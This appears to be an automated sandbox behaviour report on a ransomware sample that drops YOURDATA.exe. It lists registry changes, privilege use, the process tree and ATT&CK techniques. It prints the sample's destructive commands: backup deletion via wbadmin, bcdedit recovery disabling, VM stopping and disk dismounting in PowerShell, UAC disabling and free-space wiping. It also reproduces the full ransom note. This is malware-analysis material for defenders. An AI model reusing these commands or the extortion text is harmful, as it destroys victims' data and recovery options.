description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe -
Modifies registry class 19 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" 2ks.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command 2ks.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile 2ks.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*" 2ks.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command YOURDATA.exe Key created \REGISTRY\MACHINE\Software\Classes\mimicfile\shell\open\command YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.2000USD\ = "mimicfile" YOURDATA.exe Key created \REGISTRY\MACHINE\Software\Classes\.2000USD YOURDATA.exe Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command 2ks.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open 2ks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open\command YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\----Read-Me-----.txt\"" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell\open YOURDATA.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell 2ks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" YOURDATA.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mimicfile\shell YOURDATA.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 408 YOURDATA.exe 408 YOURDATA.exe 4480 YOURDATA.exe 4480 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 3036 YOURDATA.exe 4596 powershell.exe 4596 powershell.exe 2296 powershell.exe 3644 powershell.exe 4596 powershell.exe 2296 powershell.exe 3644 powershell.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe 408 YOURDATA.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 4572 7za.exe Token: 35 4572 7za.exe Token: SeRestorePrivilege 4508 7za.exe Token: 35 4508 7za.exe Token: SeSecurityPrivilege 4508 7za.exe Token: SeSecurityPrivilege 4508 7za.exe Token: SeIncreaseQuotaPrivilege 112 2ks.exe Token: SeSecurityPrivilege 112 2ks.exe Token: SeTakeOwnershipPrivilege 112 2ks.exe Token: SeLoadDriverPrivilege 112 2ks.exe Token: SeSystemProfilePrivilege 112 2ks.exe Token: SeSystemtimePrivilege 112 2ks.exe Token: SeProfSingleProcessPrivilege 112 2ks.exe Token: SeIncBasePriorityPrivilege 112 2ks.exe Token: SeCreatePagefilePrivilege 112 2ks.exe Token: SeBackupPrivilege 112 2ks.exe Token: SeRestorePrivilege 112 2ks.exe Token: SeShutdownPrivilege 112 2ks.exe Token: SeDebugPrivilege 112 2ks.exe Token: SeSystemEnvironmentPrivilege 112 2ks.exe Token: SeChangeNotifyPrivilege 112 2ks.exe Token: SeRemoteShutdownPrivilege 112 2ks.exe Token: SeUndockPrivilege 112 2ks.exe Token: SeManageVolumePrivilege 112 2ks.exe Token: SeImpersonatePrivilege 112 2ks.exe Token: SeCreateGlobalPrivilege 112 2ks.exe Token: 33 112 2ks.exe Token: 34 112 2ks.exe Token: 35 112 2ks.exe Token: 36 112 2ks.exe Token: SeIncreaseQuotaPrivilege 3036 YOURDATA.exe Token: SeSecurityPrivilege 3036 YOURDATA.exe Token: SeTakeOwnershipPrivilege 3036 YOURDATA.exe Token: SeLoadDriverPrivilege 3036 YOURDATA.exe Token: SeSystemProfilePrivilege 3036 YOURDATA.exe Token: SeSystemtimePrivilege 3036 YOURDATA.exe Token: SeProfSingleProcessPrivilege 3036 YOURDATA.exe Token: SeIncBasePriorityPrivilege 3036 YOURDATA.exe Token: SeCreatePagefilePrivilege 3036 YOURDATA.exe Token: SeBackupPrivilege 3036 YOURDATA.exe Token: SeRestorePrivilege 3036 YOURDATA.exe Token: SeShutdownPrivilege 3036 YOURDATA.exe Token: SeDebugPrivilege 3036 YOURDATA.exe Token: SeSystemEnvironmentPrivilege 3036 YOURDATA.exe Token: SeChangeNotifyPrivilege 3036 YOURDATA.exe Token: SeRemoteShutdownPrivilege 3036 YOURDATA.exe Token: SeUndockPrivilege 3036 YOURDATA.exe Token: SeManageVolumePrivilege 3036 YOURDATA.exe Token: SeImpersonatePrivilege 3036 YOURDATA.exe Token: SeCreateGlobalPrivilege 3036 YOURDATA.exe Token: 33 3036 YOURDATA.exe Token: 34 3036 YOURDATA.exe Token: 35 3036 YOURDATA.exe Token: 36 3036 YOURDATA.exe Token: SeIncreaseQuotaPrivilege 3100 YOURDATA.exe Token: SeSecurityPrivilege 3100 YOURDATA.exe Token: SeTakeOwnershipPrivilege 3100 YOURDATA.exe Token: SeLoadDriverPrivilege 3100 YOURDATA.exe Token: SeIncreaseQuotaPrivilege 408 YOURDATA.exe Token: SeSecurityPrivilege 408 YOURDATA.exe Token: SeSystemProfilePrivilege 3100 YOURDATA.exe Token: SeTakeOwnershipPrivilege 408 YOURDATA.exe Token: SeSystemtimePrivilege 3100 YOURDATA.exe Token: SeLoadDriverPrivilege 408 YOURDATA.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3524 Everything.exe 4588 Everything.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1856 wrote to memory of 4572 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 83 PID 1856 wrote to memory of 4572 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 83 PID 1856 wrote to memory of 4572 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 83 PID 1856 wrote to memory of 4508 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 85 PID 1856 wrote to memory of 4508 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 85 PID 1856 wrote to memory of 4508 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 85 PID 1856 wrote to memory of 112 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 87 PID 1856 wrote to memory of 112 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 87 PID 1856 wrote to memory of 112 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 87 PID 112 wrote to memory of 3036 112 2ks.exe 88 PID 112 wrote to memory of 3036 112 2ks.exe 88 PID 112 wrote to memory of 3036 112 2ks.exe 88 PID 3036 wrote to memory of 2432 3036 YOURDATA.exe 89 PID 3036 wrote to memory of 2432 3036 YOURDATA.exe 89 PID 3036 wrote to memory of 2432 3036 YOURDATA.exe 89 PID 2432 wrote to memory of 5112 2432 cmd.exe 91 PID 2432 wrote to memory of 5112 2432 cmd.exe 91 PID 2432 wrote to memory of 5112 2432 cmd.exe 91 PID 3036 wrote to memory of 3100 3036 YOURDATA.exe 94 PID 3036 wrote to memory of 3100 3036 YOURDATA.exe 94 PID 3036 wrote to memory of 3100 3036 YOURDATA.exe 94 PID 3036 wrote to memory of 408 3036 YOURDATA.exe 95 PID 3036 wrote to memory of 408 3036 YOURDATA.exe 95 PID 3036 wrote to memory of 408 3036 YOURDATA.exe 95 PID 3036 wrote to memory of 4480 3036 YOURDATA.exe 96 PID 3036 wrote to memory of 4480 3036 YOURDATA.exe 96 PID 3036 wrote to memory of 4480 3036 YOURDATA.exe 96 PID 3036 wrote to memory of 3524 3036 YOURDATA.exe 99 PID 3036 wrote to memory of 3524 3036 YOURDATA.exe 99 PID 3036 wrote to memory of 3524 3036 YOURDATA.exe 99 PID 1856 wrote to memory of 2236 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 103 PID 1856 wrote to memory of 2236 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 103 PID 1856 wrote to memory of 2236 1856 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe 103 PID 3036 wrote to memory of 3508 3036 YOURDATA.exe 124 PID 3036 wrote to memory of 3508 3036 YOURDATA.exe 124 PID 3036 wrote to memory of 1320 3036 YOURDATA.exe 125 PID 3036 wrote to memory of 1320 3036 YOURDATA.exe 125 PID 3036 wrote to memory of 4436 3036 YOURDATA.exe 127 PID 3036 wrote to memory of 4436 3036 YOURDATA.exe 127 PID 3036 wrote to memory of 1524 3036 YOURDATA.exe 129 PID 3036 wrote to memory of 1524 3036 YOURDATA.exe 129 PID 3036 wrote to memory of 1788 3036 YOURDATA.exe 130 PID 3036 wrote to memory of 1788 3036 YOURDATA.exe 130 PID 3036 wrote to memory of 780 3036 YOURDATA.exe 131 PID 3036 wrote to memory of 780 3036 YOURDATA.exe 131 PID 3036 wrote to memory of 1520 3036 YOURDATA.exe 133 PID 3036 wrote to memory of 1520 3036 YOURDATA.exe 133 PID 3036 wrote to memory of 4648 3036 YOURDATA.exe 135 PID 3036 wrote to memory of 4648 3036 YOURDATA.exe 135 PID 3036 wrote to memory of 2940 3036 YOURDATA.exe 137 PID 3036 wrote to memory of 2940 3036 YOURDATA.exe 137 PID 3036 wrote to memory of 4276 3036 YOURDATA.exe 138 PID 3036 wrote to memory of 4276 3036 YOURDATA.exe 138 PID 3036 wrote to memory of 3764 3036 YOURDATA.exe 139 PID 3036 wrote to memory of 3764 3036 YOURDATA.exe 139 PID 3036 wrote to memory of 1940 3036 YOURDATA.exe 141 PID 3036 wrote to memory of 1940 3036 YOURDATA.exe 141 PID 3036 wrote to memory of 1424 3036 YOURDATA.exe 142 PID 3036 wrote to memory of 1424 3036 YOURDATA.exe 142 PID 3036 wrote to memory of 4156 3036 YOURDATA.exe 143 PID 3036 wrote to memory of 4156 3036 YOURDATA.exe 143 PID 3036 wrote to memory of 1660 3036 YOURDATA.exe 144 PID 3036 wrote to memory of 1660 3036 YOURDATA.exe 144 PID 3036 wrote to memory of 3644 3036 YOURDATA.exe 147 -
System policy modification 1 TTPs 13 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HidePowerOptions = "1" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection\AllowTelemetry = "0" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" YOURDATA.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Policies\System YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Your data on your system has been encrypted by us....\n\nWe want you to know that you will not get your data back with the usual data recovery methods...\n\nWe will restore your data for 3.000 dollars.\n\nYou can send an e-mail with your reference code below\n\nWe Do Not Negotiate \nWe do not give discounts.\nThe price is very reasonable\n\n\n######################################################################\n\nIf you contact me to ask for a discount or to negotiate, I will increase the price I offer.\n\n######################################################################\n\nWhen you send us an e-mail, please send us your reference code below\n\n=> YOUR REFERENCE CODE <=\n\nWO3F1OCfZ_OOmh0E6lwLOdNfpzicHisJOLAXRijbj3o*[email protected]\n\n=> OUR E-MAIL ADDRESS <=\n\[email protected]\[email protected]\[email protected]\n\nIf you do not receive a reply from the above e-mail within 24 hours, you can also contact the following e-mail address\n\n=> OUR SECOND E-MAIL ADDRESS <=\n\[email protected]\n\n" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = " " YOURDATA.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe"C:\Users\Admin\AppData\Local\Temp\81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" i2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4572
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" x -y -p731121544783912138 Everything64.dll2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2ks.exe"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\2ks.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system executable filetype association
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe"C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe"3⤵
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Modifies system executable filetype association
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3036 -
C:\Windows\SysWOW64\cmd.execmd.exe /c DC.exe /D4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\DC.exeDC.exe /D5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5112
-
-
-
C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe"C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe" -e watch -pid 3036 -!4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
-
C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe"C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe" -e ul14⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe"C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\YOURDATA.exe" -e ul24⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4480
-
-
C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\Everything.exe"C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\Everything.exe" -startup4⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3524
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -H off4⤵
- Power Settings
PID:3508
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 04⤵
- Power Settings
PID:1320
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 04⤵
- Power Settings
PID:4436
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 04⤵
- Power Settings
PID:1524
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 04⤵
- Power Settings
PID:1788
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 04⤵
- Power Settings
PID:780
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 04⤵
- Power Settings
PID:1520
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 04⤵
- Power Settings
PID:4648
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 04⤵
- Power Settings
PID:2940
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 04⤵
- Power Settings
PID:4276
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 04⤵
- Power Settings
PID:3764
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 04⤵
- Power Settings
PID:1940
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 04⤵
- Power Settings
PID:1424
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c4⤵
- Power Settings
PID:4156
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -S e9a42b02-d5df-448d-aa00-03f14749eb614⤵
- Power Settings
PID:1660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass "Get-VM | Stop-VM"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass "Get-VM | Select-Object vmid | Get-VHD | %{Get-DiskImage -ImagePath $_.Path; Get-DiskImage -ImagePath $_.ParentPath} | Dismount-DiskImage"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass "Get-Volume | Get-DiskImage | Dismount-DiskImage"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2296
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:264
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
PID:1292
-
-
C:\Windows\SYSTEM32\wbadmin.exewbadmin.exe DELETE SYSTEMSTATEBACKUP4⤵
- Deletes System State backups
- Drops file in Windows directory
PID:3384
-
-
C:\Windows\SYSTEM32\wbadmin.exewbadmin.exe delete catalog -quiet4⤵
- Deletes backup catalog
PID:3040
-
-
C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\Everything.exe"C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\Everything.exe" -startup4⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4588
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe "C:\Users\Admin\AppData\Local\----Read-Me-----.txt"4⤵
- System Location Discovery: System Language Discovery
PID:5400
-
-
C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\xdel.exe"C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\xdel.exe" -accepteula -p 1 -c C:\4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5508
-
-
C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\xdel.exe"C:\Users\Admin\AppData\Local\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\xdel.exe" -accepteula -p 1 -c F:\4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5504
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "2⤵
- System Location Discovery: System Language Discovery
PID:2236
-
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3132
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4440
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4568
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:2576
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1184
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:2840
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4760
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4152
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:5744
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:5760
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:4332
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:1424
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4180
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:2888
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
2Change Default File Association
1Image File Execution Options Injection
1Power Settings
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
